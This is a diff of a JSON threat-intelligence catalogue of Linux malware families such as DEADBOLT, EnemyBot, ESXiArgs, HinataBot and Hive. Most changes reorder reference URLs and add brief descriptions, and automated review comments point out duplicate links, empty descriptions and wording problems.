+ "description": "DEADBOLT is a linux ransomware written in Go, targeting QNAP NAS devices worldwide. The files are encrypted with AES128 encryption and will have the .deadbolt extension appended to file names.\r\n\r\n",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.deadbolt",
"https://community.riskiq.com/article/1601124b",
+ "https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html",
"https://securelist.com/new-ransomware-trends-in-2022/106457/",
- "https://www.bleepingcomputer.com/news/security/new-deadbolt-ransomware-targets-qnap-devices-asks-50-btc-for-master-key/",
- "https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html"
+ "https://www.bleepingcomputer.com/news/security/new-deadbolt-ransomware-targets-qnap-devices-asks-50-btc-for-master-key/"
],
"synonyms": [],
"type": []
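Review bot: the DEADBOLT description picks up a trailing `\r\n\r\n` together with the intended "GO" to "Go" fix; that is whitespace carried over from the upstream text and should be trimmed before the value is written, otherwise the cluster description ends in two blank lines. The ref changes in the same hunk are a reorder only, with no URL added or removed.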
@@ -4011,8 +4379,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.denonia",
- "https://thehackernews.com/2022/04/first-malware-targeting-aws-lambda.html",
- "https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/"
+ "https://www.cadosecurity.com/cado-discovers-denonia-the-first-malware-specifically-targeting-lambda/",
+ "https://thehackernews.com/2022/04/first-malware-targeting-aws-lambda.html"
],
"synonyms": [],
"type": []
@@ -4025,9 +4393,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.derusbi",
- "https://twitter.com/IntezerLabs/status/1407676522534735873?s=20",
+ "https://attack.mitre.org/groups/G0001/",
"https://attack.mitre.org/groups/G0096",
- "https://attack.mitre.org/groups/G0001/"
+ "https://twitter.com/IntezerLabs/status/1407676522534735873?s=20"
],
"synonyms": [],
"type": []
@@ -4041,8 +4409,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.dofloo",
"https://blog.syscall.party/post/aes-ddos-analysis-part-1/",
- "https://www.bleepingcomputer.com/news/security/exposed-docker-apis-abused-by-ddos-cryptojacking-botnet-malware/",
- "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf"
+ "https://www.botconf.eu/wp-content/uploads/2015/12/OK-P13-Liu-Ya-Automatically-Classify-Unknown-Bots-by-The-Register-Messages.pdf",
+ "https://www.bleepingcomputer.com/news/security/exposed-docker-apis-abused-by-ddos-cryptojacking-botnet-malware/"
],
"synonyms": [
"AESDDoS"
@@ -4058,8 +4426,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.doki",
"https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.securecoding.com/blog/all-about-doki-malware/",
- "https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/"
+ "https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/",
+ "https://www.securecoding.com/blog/all-about-doki-malware/"
],
"synonyms": [],
"type": []
@@ -4072,8 +4440,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.doublefantasy",
- "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/",
- "https://www.antiy.com/response/FROM_EQUATION_TO_EQUATIONS.pdf"
+ "https://www.antiy.com/response/FROM_EQUATION_TO_EQUATIONS.pdf",
+ "https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/"
],
"synonyms": [],
"type": []
@@ -4086,15 +4454,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury",
- "https://www.welivesecurity.com/2014/10/15/operation-windigo-good-job-eset-says-malware-author/",
"https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf",
- "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/",
"https://csirt.gov.it/data/cms/posts/582/attachments/66ca2e9a-68cd-4df5-81a2-674c31a699c2/download",
- "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/",
- "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy",
"https://security.web.cern.ch/security/advisories/windigo/windigo.shtml",
- "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/"
+ "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/",
+ "https://www.welivesecurity.com/2018/12/05/dark-side-of-the-forsshe/",
+ "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/",
+ "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy",
+ "https://www.welivesecurity.com/2014/10/15/operation-windigo-good-job-eset-says-malware-author/",
+ "https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf"
],
"synonyms": [],
"type": []
@@ -4107,9 +4475,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.echobot",
+ "https://www.bleepingcomputer.com/news/security/new-echobot-botnet-variant-uses-over-50-exploits-to-propagate/",
"https://unit42.paloaltonetworks.com/new-mirai-variant-adds-8-new-exploits-targets-additional-iot-devices/",
"https://blogs.akamai.com/sitr/2019/06/latest-echobot-26-infection-vectors.html",
- "https://www.bleepingcomputer.com/news/security/new-echobot-botnet-variant-uses-over-50-exploits-to-propagate/",
"https://www.f5.com/labs/articles/threat-intelligence/echobot-malware-now-up-to-71-exploits--targeting-scada"
],
"synonyms": [],
@@ -4119,12 +4487,14 @@
"value": "Echobot"
},
{
- "description": "",
+ "description": "According to the Infosec Institute, EnemyBot is a dangerous IoT botnet that has made headlines in the last few weeks. This threat, which seems to be disseminated by the Keksec group, expanded its features by adding recent vulnerabilities discovered in 2022. It was designed to attack web servers, Android devices and content management systems (CMS) servers.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.enemybot",
- "https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory",
"https://www.fortinet.com/blog/threat-research/enemybot-a-look-into-keksecs-latest-ddos-botnet",
+ "https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux",
+ "https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory/",
+ "https://www.securonix.com/blog/detecting-the-enemybot-botnet-advisory",
"https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers"
],
"synonyms": [],
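Review bot: the EnemyBot refs now list the Securonix advisory twice, `.../detecting-the-enemybot-botnet-advisory/` and `.../detecting-the-enemybot-botnet-advisory`; trailing slashes should be normalised on import so a slash-only variant is not taken for a new reference, and one of the two lines dropped. The new description also says the botnet "has made headlines in the last few weeks", a statement that is relative to the date of the quoted Infosec Institute article and will read as stale in a static entry; tying it to a date or removing the time reference would avoid that.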
@@ -4147,14 +4517,30 @@
"uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864",
"value": "Erebus (ELF)"
},
+ {
+ "description": "Ransomware used to target ESXi servers.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.esxi_args",
+ "https://blog.ovhcloud.com/ransomware-targeting-vmware-esxi/",
+ "https://www.bleepingcomputer.com/news/security/massive-esxiargs-ransomware-attack-targets-vmware-esxi-servers-worldwide/",
+ "https://www.secuinfra.com/en/techtalk/hide-your-hypervisor-analysis-of-esxiargs-ransomware/",
+ "https://www.youtube.com/watch?v=bBcvqxPdjoI"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "7550af7f-91cc-49e7-a4c5-d4e4d993cbef",
+ "value": "ESXiArgs"
+ },
{
"description": "",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.evilgnome",
- "https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/",
+ "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf",
"https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought",
- "https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf"
+ "https://www.intezer.com/blog-evilgnome-rare-malware-spying-on-linux-desktop-users/"
],
"synonyms": [],
"type": []
@@ -4180,14 +4566,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.exaramel",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
- "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
- "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm",
"https://www.wired.com/story/sandworm-centreon-russia-hack/",
- "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
- "https://attack.mitre.org/groups/G0034",
+ "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf",
"https://twitter.com/craiu/status/1361581668092493824",
- "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf"
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-005.pdf",
+ "https://www.domaintools.com/resources/blog/centreon-to-exim-and-back-on-the-trail-of-sandworm",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
+ "https://www.welivesecurity.com/2018/10/11/new-telebots-backdoor-linking-industroyer-notpetya/",
+ "https://attack.mitre.org/groups/G0034"
],
"synonyms": [],
"type": []
@@ -4227,10 +4613,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.fbot",
+ "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html",
"https://blog.netlab.360.com/fbot-is-now-riding-the-traffic-and-transportation-smart-devices-en/",
"https://securitynews.sonicwall.com/xmlpost/vigilante-malware-removes-cryptominers-from-the-infected-device/",
- "https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html",
- "https://blog.malwaremustdie.org/2020/02/mmd-0065-2021-linuxmirai-fbot-re.html"
+ "https://blog.malwaremustdie.org/2020/01/mmd-0065-2020-linuxmirai-fbot.html"
],
"synonyms": [],
"type": []
@@ -4266,6 +4652,20 @@
"uuid": "ac30f2be-8153-4588-b29c-5e5863792930",
"value": "floodor"
},
+ {
+ "description": "Malware used to run a DDoS botnet.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.fodcha",
+ "https://blog.netlab.360.com/fodcha-a-new-ddos-botnet/",
+ "https://www.bleepingcomputer.com/news/security/fodcha-ddos-botnet-reaches-1tbps-in-power-injects-ransoms-in-packets/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "4a64a1ca-e5bc-4a27-bff2-1c68cea05ba7",
+ "value": "Fodcha"
+ },
{
"description": "This family utilizes custom modules allowing for remote access, credential harvesting (e.g. by modifying sshd) and proxy usage.\r\n\r\nIt comes with a rootkit as well.",
"meta": {
@@ -4284,11 +4684,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.fritzfrog",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.securityweek.com/sophisticated-fritzfrog-p2p-botnet-returns-after-long-break",
"https://www.akamai.com/blog/security/fritzfrog-p2p",
- "https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/"
+ "https://www.securityweek.com/sophisticated-fritzfrog-p2p-botnet-returns-after-long-break",
+ "https://www.guardicore.com/2020/08/fritzfrog-p2p-botnet-infects-ssh-servers/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [],
"type": []
@@ -4393,14 +4793,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime",
- "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf",
- "https://par.nsf.gov/servlets/purl/10096257",
- "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461",
- "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things",
"https://blog.netlab.360.com/quick-summary-port-8291-scan-en/",
"https://github.com/Psychotropos/hajime_hashes",
+ "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461",
+ "https://x86.re/blog/hajime-a-follow-up/",
"http://blog.netlab.360.com/hajime-status-report-en/",
- "https://x86.re/blog/hajime-a-follow-up/"
+ "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things",
+ "https://par.nsf.gov/servlets/purl/10096257",
+ "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf"
],
"synonyms": [],
"type": []
@@ -4450,20 +4850,36 @@
"uuid": "db3e17f0-677b-4bdb-bc26-25e62a74673d",
"value": "Hand of Thief"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hellobot",
+ "https://blog.exatrack.com/melofee/",
+ "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b9fec670-2b1e-4287-ac93-68360d5adcf4",
+ "value": "HelloBot (ELF)"
+ },
{
"description": "Linux version of the HelloKitty ransomware.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.hellokitty",
- "https://soolidsnake.github.io/2021/07/17/hellokitty_linux.html",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
- "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
- "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group",
"https://www.govinfosecurity.com/vice-society-ransomware-gang-disrupted-spar-stores-a-18225",
+ "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group/",
+ "https://unit42.paloaltonetworks.com/emerging-ransomware-groups/",
+ "https://soolidsnake.github.io/2021/07/17/hellokitty_linux.html",
+ "https://blog.sekoia.io/vice-society-a-discreet-but-steady-double-extortion-ransomware-group",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://www.bleepingcomputer.com/news/security/linux-version-of-hellokitty-ransomware-targets-vmware-esxi-servers/",
"https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/",
- "https://www.bleepingcomputer.com/news/security/linux-version-of-hellokitty-ransomware-targets-vmware-esxi-servers/"
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself"
],
"synonyms": [],
"type": []
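Review bot: the HelloKitty (ELF) refs end up with the Sekoia Vice Society post twice, with and without a trailing slash (`.../vice-society-a-discreet-but-steady-double-extortion-ransomware-group/` and the same URL without `/`); this is the same trailing-slash normalisation gap as elsewhere in this sync and one of the two should go. The new HelloBot (ELF) entry above it is added with an empty `description` although it carries three references; a one-line summary drawn from them would make the cluster useful in search and in the galaxy view.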
@@ -4471,6 +4887,19 @@
"uuid": "785cadf7-5c99-40bc-b718-8a98d9aa90b7",
"value": "HelloKitty (ELF)"
},
+ {
+ "description": "Lumen discovered this malware used in campaign targeting business-grade routers using a RAT they call HiatusRAT and a variant of tcpdump for traffic interception.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hiatus_rat",
+ "https://blog.lumen.com/new-hiatusrat-router-malware-covertly-spies-on-victims/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "69dcee87-dc61-48d4-a6af-177396bdb850",
+ "value": "HiatusRAT"
+ },
{
"description": "",
"meta": {
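Review bot: the HiatusRAT description has a grammar slip ("used in campaign targeting" should be "used in a campaign targeting") and describes the entry only indirectly through what Lumen observed. A wording such as "Malware observed by Lumen in a campaign targeting business-grade routers, consisting of a RAT they call HiatusRAT and a variant of tcpdump used for traffic interception." keeps the same facts and reads as a description of the family itself.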
@@ -4491,14 +4920,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek",
- "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/",
- "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/",
+ "https://blog.netlab.360.com/hns-botnet-recent-activities-en/",
"https://blog.avast.com/hide-n-seek-botnet-continues",
"https://threatlabs.avast.com/botnet",
+ "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/",
"https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/",
- "https://blog.netlab.360.com/hns-botnet-recent-activities-en/",
- "https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html",
"https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/",
+ "https://www.fortinet.com/blog/threat-research/searching-for-the-reuse-of-mirai-code--hide--n-seek-bot.html",
+ "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/",
"https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/"
],
"synonyms": [
@@ -4509,6 +4938,19 @@
"uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b",
"value": "Hide and Seek"
},
+ {
+ "description": "HinataBot is a Go-based DDoS-focused botnet. It was observed in the first quarter of 2023 targeting HTTP and SSH endpoints leveraging old vulnerabilities and weak credentials. Amongst those infection vectors are exploitation of the miniigd SOAP service on Realtek SDK devices (CVE-2014-8361), Huawei HG532 routers (CVE-2017-17215), and exposed Hadoop YARN servers.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hinata_bot",
+ "https://www.akamai.com/blog/security-research/hinatabot-uncovering-new-golang-ddos-botnet"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b10fc382-b740-417a-98fa-e23d10223958",
+ "value": "HinataBot"
+ },
{
"description": "",
"meta": {
@@ -4527,25 +4969,27 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.hive",
- "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
"https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/",
- "https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/",
- "https://arxiv.org/pdf/2202.08477.pdf",
- "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
- "https://github.com/rivitna/Malware/tree/main/Hive",
- "https://twitter.com/ESETresearch/status/1454100591261667329",
- "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
- "https://blog.group-ib.com/hive",
- "https://twitter.com/malwrhunterteam/status/1455628865229950979",
- "https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/",
+ "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/",
"https://securityaffairs.co/wordpress/128232/security/recover-files-hive-ransomware.html",
+ "https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/",
+ "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again",
+ "https://therecord.media/hive-ransomware-shuts-down-california-health-care-organization/",
+ "https://github.com/reecdeep/HiveV5_file_decryptor",
"https://yoroi.company/wp-content/uploads/2022/07/Yoroi-On-The-Footsteps-of-Hive-Ransomware.pdf",
"https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-hive",
- "https://lifars.com/2022/02/how-to-decrypt-the-files-encrypted-by-the-hive-ransomware/",
"https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://arxiv.org/pdf/2202.08477.pdf",
+ "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf",
+ "https://twitter.com/malwrhunterteam/status/1455628865229950979",
"https://thehackernews.com/2022/02/master-key-for-hive-ransomware.html",
- "https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again"
+ "https://twitter.com/ESETresearch/status/1454100591261667329",
+ "https://therecord.media/academics-publish-method-for-recovering-data-encrypted-by-the-hive-ransomware/",
+ "https://blog.group-ib.com/hive",
+ "https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html",
+ "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
+ "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-april-1st-2022-i-can-fight-with-a-keyboard/",
+ "https://github.com/rivitna/Malware/tree/main/Hive"
],
"synonyms": [],
"type": []
@@ -4566,6 +5010,21 @@
"uuid": "c55389b0-e778-4cf9-9030-3d1efc1224c9",
"value": "Hubnr"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hyperssl",
+ "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html"
+ ],
+ "synonyms": [
+ "SysUpdate"
+ ],
+ "type": []
+ },
+ "uuid": "263aaef5-9758-49f1-aff1-9a509f545bb3",
+ "value": "HyperSSL (ELF)"
+ },
{
"description": "",
"meta": {
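Review bot: the new HyperSSL (ELF) entry is added with an empty `description` even though the synonym `SysUpdate` and the Trend Micro reference ("iron-tiger-sysupdate-adds-linux-targeting") already state what it is; a short line such as "Linux version of SysUpdate, reported by Trend Micro in the Iron Tiger analysis" would avoid shipping a blank description alongside a named synonym.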
@@ -4585,8 +5044,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper",
"https://research.checkpoint.com/new-iot-botnet-storm-coming/",
- "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/",
- "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm"
+ "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm",
+ "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/"
],
"synonyms": [
"IoTroop",
@@ -4603,11 +5062,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.ipstorm",
- "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://www.anomali.com/blog/the-interplanetary-storm-new-malware-in-wild-using-interplanetary-file-systems-ipfs-p2p-network",
"https://www.bitdefender.com/files/News/CaseStudies/study/376/Bitdefender-Whitepaper-IPStorm.pdf",
- "https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/"
+ "https://www.intezer.com/blog/research/a-storm-is-brewing-ipstorm-now-has-linux-malware/",
+ "https://www.anomali.com/blog/the-interplanetary-storm-new-malware-in-wild-using-interplanetary-file-systems-ipfs-p2p-network",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/"
],
"synonyms": [
"InterPlanetary Storm"
@@ -4636,10 +5095,11 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiji",
"https://blog.trendmicro.com/trendlabs-security-intelligence/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers/",
+ "https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/",
"https://www.bitdefender.com/box/blog/iot-news/kaiji-new-strain-iot-malware-seizing-control-launching-ddos-attacks/",
+ "https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/",
"https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/",
- "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
- "https://intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/"
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775"
],
"synonyms": [],
"type": []
@@ -4648,15 +5108,16 @@
"value": "Kaiji"
},
{
- "description": "",
+ "description": "According to netenrich, Kaiten is a Trojan horse that opens a back door on the compromised computer that allows it to perform other malicious activities. The trojan does not create any copies of itself. This Backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten",
+ "https://www.lacework.com/blog/the-kek-security-network/",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day",
"https://www.blackarrow.net/attackers-abuse-mobileirons-rce-to-deliver-kaiten/",
"https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/apache-log4j-zero-day",
- "https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html",
- "https://www.lacework.com/the-kek-security-network/"
+ "https://www.lacework.com/the-kek-security-network/",
+ "https://www.trendmicro.com/en_us/research/20/i/exposed-docker-server-abused-to-drop-cryptominer-ddos-bot-.html"
],
"synonyms": [
"STD"
@@ -4671,11 +5132,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.kerberods",
- "https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers.html",
- "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
+ "https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916",
"https://blog.talosintelligence.com/2019/09/watchbog-patching.html",
+ "https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang",
"https://blog.trendmicro.com/trendlabs-security-intelligence/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit/",
- "https://isc.sans.edu/forums/diary/Vulnerable+Apache+Jenkins+exploited+in+the+wild/24916"
+ "https://www.fortinet.com/blog/threat-research/rocke-variant-ready-to-box-mining-challengers.html"
],
"synonyms": [],
"type": []
@@ -4688,11 +5149,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.keyplug",
- "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf",
+ "https://www.mandiant.com/resources/apt41-us-state-governments",
"https://twitter.com/CyberJack42/status/1501290277864046595",
- "https://experience.mandiant.com/trending-evil/p/1",
"https://www.mandiant.com/resources/mobileiron-log4shell-exploitation",
- "https://www.mandiant.com/resources/apt41-us-state-governments"
+ "https://experience.mandiant.com/trending-evil/p/1",
+ "https://i.blackhat.com/Asia-22/Thursday-Materials/AS-22-LeonSilvia-NextGenPlugXShadowPad.pdf"
],
"synonyms": [
"ELFSHELF"
@@ -4720,25 +5181,25 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/elf.kinsing",
- "https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf",
+ "https://unit42.paloaltonetworks.com/atoms/moneylibra/",
+ "https://www.cadosecurity.com/analysis-of-initial-in-the-wild-attacks-exploiting-log4shell-log4j-cve-2021-44228/",
+ "https://www.alibabacloud.com/blog/new-outbreak-of-h2miner-worms-exploiting-redis-rce-detected_595743",
+ "https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces",
+ "https://www.ibm.com/downloads/cas/WMDZOWK6?social_post=5483919673&linkId=131648775",
